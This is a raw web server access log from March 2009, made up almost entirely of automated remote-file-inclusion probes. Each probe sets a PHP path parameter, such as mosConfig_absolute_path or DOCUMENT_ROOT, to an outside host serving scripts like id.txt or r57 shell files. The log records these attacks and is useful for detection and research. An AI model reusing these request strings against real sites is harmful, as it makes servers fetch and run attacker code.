87.101.4.49 - - [07/Mar/2009:13:10:36 -0600] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Mar/2009:13:10:36 -0600] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
202.69.201.132 - - [07/Mar/2009:13:11:47 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://racrew.us/sophie/raid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
202.69.201.132 - - [07/Mar/2009:13:11:47 -0600] "GET //include/admin.lib.inc.php?site_path=http://racrew.us/sophie/raid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
194.183.15.230 - - [07/Mar/2009:13:16:18 -0600] "GET ////skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
194.183.15.230 - - [07/Mar/2009:13:16:25 -0600] "GET /logs////skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
194.183.15.230 - - [07/Mar/2009:13:16:25 -0600] "GET /logs/access_log.1234224000////skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
194.183.15.230 - - [07/Mar/2009:13:16:47 -0600] "GET /logs/access_log.1230595200////skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.172.33.230 - - [07/Mar/2009:13:21:09 -0600] "GET //components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
209.172.33.230 - - [07/Mar/2009:13:21:09 -0600] "GET /logs//components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
209.172.33.230 - - [07/Mar/2009:13:21:09 -0600] "GET /logs/access_log.1231977600//components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.27.110.65 - - [07/Mar/2009:13:26:00 -0600] "GET /logs/errors.php?error=http://viparenda.ru/includes/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
69.27.110.65 - - [07/Mar/2009:13:26:00 -0600] "GET /errors.php?error=http://viparenda.ru/includes/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
77.221.130.17 - - [07/Mar/2009:13:31:17 -0600] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.221.130.17 - - [07/Mar/2009:13:31:17 -0600] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
202.69.201.132 - - [07/Mar/2009:13:36:35 -0600] "GET //components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.69.201.132 - - [07/Mar/2009:13:36:35 -0600] "GET /logs//components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
202.69.201.132 - - [07/Mar/2009:13:36:35 -0600] "GET /logs/access_log.1231977600//components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
70.87.206.226 - - [07/Mar/2009:13:38:35 -0600] "GET /logs//?DOCUMENT_ROOT=http://lanaalaadi.com/gallery/data/r57/test.txt?? HTTP/1.1" 200 180672 "-""libwww-perl/5.811"
70.87.206.226 - - [07/Mar/2009:13:38:36 -0600] "GET //?DOCUMENT_ROOT=http://lanaalaadi.com/gallery/data/r57/test.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
85.237.201.58 - - [07/Mar/2009:13:39:08 -0600] "GET /logs//?DOCUMENT_ROOT=http://lanaalaadi.com/gallery/data/r57/db.txt?? HTTP/1.1" 200 180672 "-""libwww-perl/5.803"
85.237.201.58 - - [07/Mar/2009:13:39:09 -0600] "GET //?DOCUMENT_ROOT=http://lanaalaadi.com/gallery/data/r57/db.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
70.38.71.140 - - [07/Mar/2009:13:43:41 -0600] "GET ///vwar/backup/errors.php?error=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
70.38.71.140 - - [07/Mar/2009:13:43:41 -0600] "GET /logs///vwar/backup/errors.php?error=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
84.19.182.112 - - [07/Mar/2009:13:48:32 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:13:48:33 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:13:48:33 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:13:48:33 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:13:48:35 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:13:48:35 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:13:48:35 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:13:48:36 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:13:48:36 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
84.19.182.112 - - [07/Mar/2009:13:48:36 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
67.99.100.113 - - [07/Mar/2009:13:48:36 -0600] "GET /logs/access_log.1234828800/main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.99.100.113 - - [07/Mar/2009:13:48:36 -0600] "GET /main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
67.99.100.113 - - [07/Mar/2009:13:48:36 -0600] "GET /logs/main.php?pagina=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
84.19.182.112 - - [07/Mar/2009:13:48:49 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
84.19.182.112 - - [07/Mar/2009:13:48:49 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
84.19.182.112 - - [07/Mar/2009:13:48:50 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
84.19.182.112 - - [07/Mar/2009:13:48:50 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.52.213.40 - - [07/Mar/2009:13:50:15 -0600] "GET /logs///vwar/backup/errors.php?error=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
72.52.213.40 - - [07/Mar/2009:13:50:15 -0600] "GET ///vwar/backup/errors.php?error=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
118.217.216.132 - - [07/Mar/2009:13:50:38 -0600] "GET //config/dbutil.bck.php?confdir=http://zphone.co.kr/technote7/data/shirohige/fxid.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
118.217.216.132 - - [07/Mar/2009:13:50:38 -0600] "GET /logs/access_log.1234224000//config/dbutil.bck.php?confdir=http://zphone.co.kr/technote7/data/shirohige/fxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
118.217.216.132 - - [07/Mar/2009:13:50:38 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://zphone.co.kr/technote7/data/shirohige/fxid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
118.217.216.132 - - [07/Mar/2009:13:50:38 -0600] "GET /logs/access_log.1233619200//config/dbutil.bck.php?confdir=http://zphone.co.kr/technote7/data/shirohige/fxid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
70.38.71.140 - - [07/Mar/2009:13:52:06 -0600] "GET /logs///vwar/backup/errors.php?error=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
70.38.71.140 - - [07/Mar/2009:13:52:06 -0600] "GET ///vwar/backup/errors.php?error=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
84.19.182.112 - - [07/Mar/2009:13:53:09 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wichtl.at/files/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
84.19.182.112 - - [07/Mar/2009:13:53:09 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wichtl.at/files/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.254.49.34 - - [07/Mar/2009:13:55:06 -0600] "GET /logs///vwar/backup/errors.php?error=http://blog100.asia/survey//jpg/yes.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
65.254.49.34 - - [07/Mar/2009:13:55:06 -0600] "GET ///vwar/backup/errors.php?error=http://blog100.asia/survey//jpg/yes.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
202.69.201.132 - - [07/Mar/2009:13:56:30 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://racrew.us/sophie/raid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
202.69.201.132 - - [07/Mar/2009:13:56:32 -0600] "GET //skin/zero_vote/error.php?dir=http://racrew.us/sophie/raid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
207.126.55.228 - - [07/Mar/2009:13:58:54 -0600] "GET /logs///vwar/backup/errors.php?error=http://blog100.asia/survey//jpg/yes.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
207.126.55.228 - - [07/Mar/2009:13:58:54 -0600] "GET ///vwar/backup/errors.php?error=http://blog100.asia/survey//jpg/yes.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
207.126.55.228 - - [07/Mar/2009:13:59:05 -0600] "GET /logs///vwar/backup/errors.php?error=http://blog100.asia/survey//jpg/yes.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
207.126.55.228 - - [07/Mar/2009:13:59:05 -0600] "GET ///vwar/backup/errors.php?error=http://blog100.asia/survey//jpg/yes.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
67.15.48.60 - - [07/Mar/2009:14:00:13 -0600] "GET //include/admin.lib.inc.php?site_path=http://members.mywave.at/m206111aa/cms//administrator/components/com_mkpostman/includes/poiid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
67.15.48.60 - - [07/Mar/2009:14:00:14 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://members.mywave.at/m206111aa/cms//administrator/components/com_mkpostman/includes/poiid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
219.85.63.226 - - [07/Mar/2009:14:06:20 -0600] "GET /include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:14:06:20 -0600] "GET /logs/include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
67.15.48.60 - - [07/Mar/2009:14:06:49 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://members.mywave.at/m206111aa/cms//administrator/components/com_mkpostman/includes/poiid.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
67.15.48.60 - - [07/Mar/2009:14:06:49 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://members.mywave.at/m206111aa/cms//administrator/components/com_mkpostman/includes/poiid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
139.179.10.6 - - [07/Mar/2009:14:07:43 -0600] "GET /logs//_test_holidays.php?APB_rp=http://okto.co.kr//zboard/include/v6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
139.179.10.6 - - [07/Mar/2009:14:07:43 -0600] "GET //_test_holidays.php?APB_rp=http://okto.co.kr//zboard/include/v6.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
219.85.63.226 - - [07/Mar/2009:14:08:28 -0600] "GET /include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:14:08:29 -0600] "GET /logs/include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
208.82.180.145 - - [07/Mar/2009:14:09:03 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dantesjuice.com/maksim/cmdtemp/id.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
208.82.180.145 - - [07/Mar/2009:14:09:03 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dantesjuice.com/maksim/cmdtemp/id.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
139.179.10.6 - - [07/Mar/2009:14:10:44 -0600] "GET /logs/access_log.1234656000//_test_holidays.php?APB_rp=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
139.179.10.6 - - [07/Mar/2009:14:10:44 -0600] "GET /logs//_test_holidays.php?APB_rp=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
139.179.10.6 - - [07/Mar/2009:14:10:44 -0600] "GET //_test_holidays.php?APB_rp=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
216.17.106.121 - - [07/Mar/2009:14:10:46 -0600] "GET /logs/access_log.1233619200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
216.17.106.121 - - [07/Mar/2009:14:10:46 -0600] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
216.17.106.121 - - [07/Mar/2009:14:10:46 -0600] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
216.17.106.121 - - [07/Mar/2009:14:10:49 -0600] "GET /logs/access_log.1233792000//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
139.179.10.6 - - [07/Mar/2009:14:11:24 -0600] "GET /logs/access_log.1234742400//_test_holidays.php?APB_rp=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
139.179.10.6 - - [07/Mar/2009:14:11:26 -0600] "GET /logs/access_log.1234656000//_test_holidays.php?APB_rp=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
139.179.10.6 - - [07/Mar/2009:14:11:26 -0600] "GET //_test_holidays.php?APB_rp=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
139.179.10.6 - - [07/Mar/2009:14:11:26 -0600] "GET /logs//_test_holidays.php?APB_rp=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
139.179.10.6 - - [07/Mar/2009:14:12:16 -0600] "GET /logs/access_log.1234742400//_test_holidays.php?APB_rp=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
62.44.70.253 - - [07/Mar/2009:14:14:25 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:14:14:25 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:14:14:26 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:14:16:59 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:14:17:00 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:14:17:00 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.22.60.25 - - [07/Mar/2009:14:18:27 -0600] "GET //index.php?DOCUMENT_ROOT=http://www.laneviera.com/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
217.22.60.25 - - [07/Mar/2009:14:18:27 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://www.laneviera.com/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
219.85.63.226 - - [07/Mar/2009:14:23:28 -0600] "GET /logs/include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:14:23:28 -0600] "GET /include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.221.130.17 - - [07/Mar/2009:14:25:13 -0600] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
77.221.130.17 - - [07/Mar/2009:14:25:13 -0600] "GET /logs/index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://harasin.brinkster.net/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
67.19.130.218 - - [07/Mar/2009:14:27:53 -0600] "GET /logs//appserv/main.php?appserv_root=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:14:27:53 -0600] "GET /logs/access_log.1231977600//appserv/main.php?appserv_root=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:14:27:53 -0600] "GET //appserv/main.php?appserv_root=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
219.85.63.226 - - [07/Mar/2009:14:28:15 -0600] "GET /logs/include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:14:28:28 -0600] "GET /include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
123.214.171.59 - - [07/Mar/2009:14:30:47 -0600] "GET /logs/?INCLUDE_FOLDER=http://viparenda.ru/includes/images/safe.txt??? HTTP/1.1" 200 180667 "-""libwww-perl/5.65"
123.214.171.59 - - [07/Mar/2009:14:30:47 -0600] "GET /?INCLUDE_FOLDER=http://viparenda.ru/includes/images/safe.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
219.85.63.226 - - [07/Mar/2009:14:33:08 -0600] "GET /logs/include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:14:33:09 -0600] "GET /include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
69.27.110.65 - - [07/Mar/2009:14:34:17 -0600] "GET /logs/?INCLUDE_FOLDER=http://viparenda.ru/includes/images/safe.txt??? HTTP/1.1" 200 180667 "-""libwww-perl/5.65"
69.27.110.65 - - [07/Mar/2009:14:34:18 -0600] "GET /?INCLUDE_FOLDER=http://viparenda.ru/includes/images/safe.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
196.40.83.75 - - [07/Mar/2009:14:37:04 -0600] "GET /logs//modules/forum.inc.php?INCLUDE_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
196.40.83.75 - - [07/Mar/2009:14:37:04 -0600] "GET //modules/forum.inc.php?INCLUDE_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
139.179.10.6 - - [07/Mar/2009:14:38:32 -0600] "GET /logs/access_log.1232668800/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
139.179.10.6 - - [07/Mar/2009:14:38:32 -0600] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
139.179.10.6 - - [07/Mar/2009:14:38:32 -0600] "GET /includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
139.179.10.6 - - [07/Mar/2009:14:38:32 -0600] "GET /logs/access_log.1234224000/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
139.179.10.6 - - [07/Mar/2009:14:38:52 -0600] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/v6.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
139.179.10.6 - - [07/Mar/2009:14:38:52 -0600] "GET /includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/v6.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
208.80.195.47 - - [07/Mar/2009:14:40:05 -0600] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.0.1; .NET CLR 1.0.3705)"
216.17.106.121 - - [07/Mar/2009:14:43:58 -0600] "GET /logs/index.php?basepath=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.65"
216.17.106.121 - - [07/Mar/2009:14:43:58 -0600] "GET /index.php?basepath=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.65"
139.179.10.6 - - [07/Mar/2009:14:44:22 -0600] "GET /includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
139.179.10.6 - - [07/Mar/2009:14:44:22 -0600] "GET /logs/access_log.1232668800/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
139.179.10.6 - - [07/Mar/2009:14:44:22 -0600] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
139.179.10.6 - - [07/Mar/2009:14:44:22 -0600] "GET /logs/access_log.1234224000/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
85.186.255.184 - - [07/Mar/2009:14:44:47 -0600] "GET //appserv/main.php?appserv_root=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
